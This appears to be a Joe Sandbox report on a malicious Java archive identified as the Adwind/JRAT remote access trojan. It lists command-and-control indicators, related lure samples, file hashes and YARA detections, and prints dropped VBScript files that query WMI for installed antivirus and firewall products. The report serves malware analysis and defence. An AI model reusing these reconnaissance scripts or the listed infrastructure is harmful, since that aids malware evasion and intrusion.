                                                                                                                            http://apache.org/xml/properties/internal/grammar-pooljavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://apache.org/xml/properties/localejavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://javax.xml.XMLConstants/property/accessExternalSchemaDjavaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://java.sun.com/xml/stream/properties/reader-in-defined-statejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://apache.org/xml/properties/internal/validator/dtd:java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://apache.org/xml/features/allow-java-encodingsjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://apache.org/xml/properties/validation/schema/root-element-declarationjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://apache.org/xml/features/dom/include-ignorable-whitespace/javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://apache.org/xml/features/validation/schema-full-checkingin=javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://java.sun.com/xml/stream/properties/ignore-external-dtd/Nojava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://apache.org/xml/properties/internal/datatype-validator-factory:java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://apache.org/xml/features/scanner/notify-builtin-refsnterna7javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.oracle.com/feature/use-service-mechanismjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://apache.org/xml/features/scanner/notify-builtin-refssjava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://apache.org/xml/properties/schema/external-schemaLocationaKjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://javax.xml.XMLConstants/property/accessExternalDTDjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://apache.org/xml/xmlschema/1.0/anonymousTypesjavaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://apache.org/xml/features/validation/identity-constraint-checkingesjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://apache.org/xml/features/validation/schema/normalized-valuejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://apache.org/xml/features/xinclude/fixup-languagejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.151.123.225 | pnauco5.ddns.net | unknown | | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
IP
127.0.0.1
                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                    Analysis ID:1427166
                                                                                                                                                                                    Start date and time:2024-04-17 07:01:06 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 11m 27s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:defaultwindowsfilecookbook.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:81
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • GSI enabled (Java)
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:NewOrder - P2D041197.jar
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.phis.troj.expl.evad.winJAR@196/300@1/2
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 33.3%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 93%
                                                                                                                                                                                    • Number of executed functions: 44
                                                                                                                                                                                    • Number of non-executed functions: 14
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .jar
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                    • Execution Graph export aborted for target java.exe, PID 7388 because it is empty
                                                                                                                                                                                    • Execution Graph export aborted for target java.exe, PID 7620 because it is empty
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
07:02:16 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
Match:103.151.123.225
Associated Sample Name / URL | Detection | Threat Name | Context
gcahfpmhcn.js | malicious | ADWIND
FACTURA.jar | malicious | ADWIND
FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar | malicious | ADWIND
Match:pnauco5.ddns.net
Associated Sample Name / URL | Detection | Threat Name | Context
gcahfpmhcn.js | malicious | ADWIND | 103.151.123.225
FACTURA.jar | malicious | ADWIND | 103.151.123.225
FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar | malicious | ADWIND | 103.151.123.225
Match:VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Associated Sample Name / URL | Detection | Threat Name | Context
gcahfpmhcn.js | malicious | ADWIND | 103.151.123.225
FACTURA.jar | malicious | ADWIND | 103.151.123.225
FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar | malicious | ADWIND | 103.151.123.225
SecuriteInfo.com.Win32.DropperX-gen.31374.14437.exe | malicious | Unknown | 103.200.23.179
SecuriteInfo.com.Win32.DropperX-gen.31374.14437.exe | malicious | Unknown | 103.200.23.179
FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbs | malicious | Remcos, GuLoader | 180.214.236.46
SecuriteInfo.com.Win32.TrojanX-gen.15346.16027.exe | malicious | Unknown | 103.200.23.139
SecuriteInfo.com.Win32.TrojanX-gen.15346.16027.exe | malicious | Unknown | 103.200.23.139
BKGCONF-THD1914129-BKGCONF-THD1914129.vbs | malicious | Remcos, GuLoader | 180.214.236.46
H2A6LpLYtc.elf | malicious | Gafgyt, Mirai | 14.225.234.68
                                                                                                                                                                                          No context
Match:C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll
Associated Sample Name / URL | Detection | Threat Name | Context
gcahfpmhcn.js | malicious | ADWIND
FACTURA.jar | malicious | ADWIND
FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar | malicious | ADWIND
Purchase Orders-Reg.jar | malicious | ADWIND
Swift Advice $31,470.00.jar | malicious | ADWIND
nORDER 119A %26 1.jar | malicious | ADWIND
27 payment swift copy of the remaining paymen.jar | malicious | ADWIND
DHLAWB907853880911.jar | malicious | ADWIND
Quotation.jar | malicious | ADWIND
fattura.jar | malicious | ADWIND
Match:C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll
Associated Sample Name / URL | Detection | Threat Name | Context
gcahfpmhcn.js | malicious | ADWIND
FACTURA.jar | malicious | ADWIND
FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar | malicious | ADWIND
SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exe | malicious | Poisonivy
Purchase Orders-Reg.jar | malicious | ADWIND
SecuriteInfo.com.Trojan.Siggen23.5328.29386.24001.exe | malicious | Unknown
SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exe | malicious | Poisonivy
SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exe | malicious | Poisonivy
Swift Advice $31,470.00.jar | malicious | ADWIND
4.jar | malicious | ADWIND
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):52
                                                                                                                                                                                                                                  Entropy (8bit):4.7526664005421635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:oFj4I5vpm4USZ+US7y:oJ5bALO
                                                                                                                                                                                                                                  MD5:DF5F6AD06CBB1F09DA908F9C7EB0D60A
                                                                                                                                                                                                                                  SHA1:7CFDA688402599F42ACE4CD123B516E2521E32B5
                                                                                                                                                                                                                                  SHA-256:BCC833705C019B5FF2C56B14D20DAEAAD6DEFB3EC723A016F3DA1349EEBCF847
                                                                                                                                                                                                                                  SHA-512:B68AB3C6A50A7ADB97CAD1F6ACC6CA48C2980DA3AEB11044B8AE53514586AFB003FE6F18D76A96B1A704BC88BA765523021B172FE03F52D71577E3E13F1914A9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:C:\Program Files (x86)\Java\jre-1.8..1713330117217..
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                  Entropy (8bit):5.093300055314052
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                                                                  MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                                                                  SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                                                                  SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                                                                  SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):276
                                                                                                                                                                                                                                  Entropy (8bit):5.064973526456738
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                                                                  MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                                                                  SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                                                                  SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                                                                  SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):276
                                                                                                                                                                                                                                  Entropy (8bit):5.064973526456738
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                                                                  MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                                                                  SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                                                                  SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                                                                  SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                  Entropy (8bit):5.093300055314052
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                                                                  MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                                                                  SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                                                                  SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                                                                  SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                                                                                  Entropy (8bit):6.0299567620950425
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:5iUNFqJL3HXiQl2DuhacwRZPE7dmvqID8ouM2PkYEDienAZu+P:TNFW33hdxwz87dmRDbkPKg
                                                                                                                                                                                                                                  MD5:0B7B52302C8C5DF59D960DD97E3ABDAF
                                                                                                                                                                                                                                  SHA1:D85524F464DCDED54EDFCFE6A5056F6C4008BBCB
                                                                                                                                                                                                                                  SHA-256:A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
                                                                                                                                                                                                                                  SHA-512:FA04A69CACD05042DC9F3EF0BB518B01952B59A5A2669BA3817C3E248E95F54801349CB51FCFA7CD1F3C4CB7C28615A61156D574C4F7197FDBA709544A5E8EBC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Yara Hits:
• Rule: JoeSecurity_AdWind_dll, Description: Yara detected AdWind RAT's dll, Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
• Antivirus: Virustotal, Detection: 80%
Joe Sandbox View:
• Filename: gcahfpmhcn.js, Detection: malicious
• Filename: FACTURA.jar, Detection: malicious
• Filename: FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar, Detection: malicious
• Filename: Purchase Orders-Reg.jar, Detection: malicious
• Filename: Swift Advice $31,470.00.jar, Detection: malicious
• Filename: nORDER 119A %26 1.jar, Detection: malicious
• Filename: 27 payment swift copy of the remaining paymen.jar, Detection: malicious
• Filename: DHLAWB907853880911.jar, Detection: malicious
• Filename: Quotation.jar, Detection: malicious
• Filename: fattura.jar, Detection: malicious
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):247088
                                                                                                                                                                                                                                  Entropy (8bit):7.977146417027946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:WI5pxUZ7Gvi8ulm+yV/rIF0/MO2qnan1J7pXESN6U:J5pxAGqNkrIq/MO2qnA
                                                                                                                                                                                                                                  MD5:781FB531354D6F291F1CCAB48DA6D39F
                                                                                                                                                                                                                                  SHA1:9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
                                                                                                                                                                                                                                  SHA-256:97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
                                                                                                                                                                                                                                  SHA-512:3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: MAL_JRAT_Oct18_1, Description: Detects JRAT malware, Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, Author: Florian Roth
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                  Entropy (8bit):1.2975761574449005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:spPrcf8GSHYp8JxKcgi8gza20ST1HE19o2y:spS8GS4p8JxqgzaUxHEr
                                                                                                                                                                                                                                  MD5:28EE5F6F4A61561C305B671F7241D3A5
                                                                                                                                                                                                                                  SHA1:BE2DD045C844FD68C345596540084C969CBFA493
                                                                                                                                                                                                                                  SHA-256:70A0D0A5266B7CFB3518961D7C6BE3C36E9C154F2AAFCE153C47214561F99B2F
                                                                                                                                                                                                                                  SHA-512:0C60FD0064064D27C1F4D7DE822F8087C2D5AE2113F2BA8C0DAB27577FD29CAC58EAAD72C56451B83ED49BCCEB103B7B2076559B345F1E2D23C414A1724044D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                  Entropy (8bit):1.284047418555765
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:s1Wur3o8GU4xCsvVHcgs8bzXrQIY2YuSTUHG1bowK:s1Wn8GU4xCsNHcg/MIUIHGd
                                                                                                                                                                                                                                  MD5:C872A0AA182C044112DE49CB788A5006
                                                                                                                                                                                                                                  SHA1:442969D787D2A17FF8D42F5FC98F80843AB70441
                                                                                                                                                                                                                                  SHA-256:244FC36F8716BB728B23D7FBE995030137F814B19F10BF5E6CE6539F8D59270E
                                                                                                                                                                                                                                  SHA-512:066D8E0788BAA622A20C9986F3B8FA2DFC22BA195A8D3B9D885681D6697E10F4B639956E1D43564ECD9B796DAC387FC76D45349E54ABB4AF75447213CCCAF304
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                  Entropy (8bit):1.290112597769506
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pRorV88GGxMo0Khq62QwvhgM+KGkSTAkHG1bow/T:pRj8GGxd0Khq6FM+BEkHGd5
                                                                                                                                                                                                                                  MD5:2FE84F0F38D8CF78C60FF85EE6E1CC32
                                                                                                                                                                                                                                  SHA1:1CB7F8EA9F07A9724066563D95A9B64F97A3EB3C
                                                                                                                                                                                                                                  SHA-256:F5F8EE1E7B151C778866168106FA470F9309B7A681AF390137FF0E0DA4DBF177
